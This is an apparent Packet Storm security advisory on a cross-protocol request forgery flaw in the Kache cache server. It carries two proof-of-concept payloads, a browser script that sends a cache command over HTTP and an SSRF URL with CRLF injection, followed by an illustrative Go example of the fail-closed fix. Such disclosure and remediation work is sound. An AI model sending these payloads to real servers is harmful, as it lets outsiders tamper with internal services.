Kache Cross Protocol Request Forgery

2019-03-04T00:00:00
ID PACKETSTORM:151941
Type packetstorm
Reporter Codex Lynx
Modified 2019-03-04T00:00:00

Description

                                        
`# Title: Kache / CPRF  
# Date: 03/01/2019  
# Discovered by: @codexlynx  
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (the project does not version releases yet)  
# Category: go, resp, cprf  
  
[1]CPRF (Cross Protocol Request Forgery)  
--------------------------------  
The Kache server does not close the connection when it receives unknown strings. This can allow a malicious actor to perform cross-protocol interactions.  
  
- POC 1: Set a key over HTTP:  
  
<script>  
var x = new XMLHttpRequest();  
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");  
x.send("set mykey myvalue\n");  
</script>  
  
- POC 2: Exploit this CPRF to set a key via SSRF + CRLF injection:  
  
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue  
`
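
The root cause described above, with the fail-closed fix beside it, as an added example that is not Kache's code and not part of the original advisory. `handleSession`, its two-command set, the `strict` flag and the host `cache.example:7088` are assumptions made for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"strings"
)

// handleSession is a hypothetical line-protocol loop, not Kache's own code.
// strict=false keeps reading after unrecognized input (the behaviour the
// advisory reports); strict=true returns an error at the first such line so
// the caller can close the connection.
func handleSession(r io.Reader, w io.Writer, store map[string]string, strict bool) error {
	sc := bufio.NewScanner(r)
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		switch {
		case len(f) == 3 && f[0] == "set":
			store[f[1]] = f[2]
			fmt.Fprintln(w, "OK")
		case len(f) == 2 && f[0] == "get":
			fmt.Fprintln(w, store[f[1]])
		case strict:
			// HTTP request lines, headers and blank lines all end up here.
			return fmt.Errorf("unrecognized input %q: closing connection", sc.Text())
		default:
			fmt.Fprintln(w, "ERR unknown command") // lenient: keep the session open
		}
	}
	return sc.Err()
}

func main() {
	// Constructed sample: roughly what a browser sends for POC 1 (headers trimmed).
	req := "POST / HTTP/1.1\r\nHost: cache.example:7088\r\n\r\nset mykey myvalue\n"
	for _, strict := range []bool{false, true} {
		store := map[string]string{}
		err := handleSession(strings.NewReader(req), io.Discard, store, strict)
		fmt.Printf("strict=%v store=%v err=%v\n", strict, store, err)
	}
}
```

In strict mode the session ends on the HTTP request line, before the body or any CRLF-injected line is parsed. Exact arity matching also rejects an injected `set mykey myvalue HTTP/1.1` line.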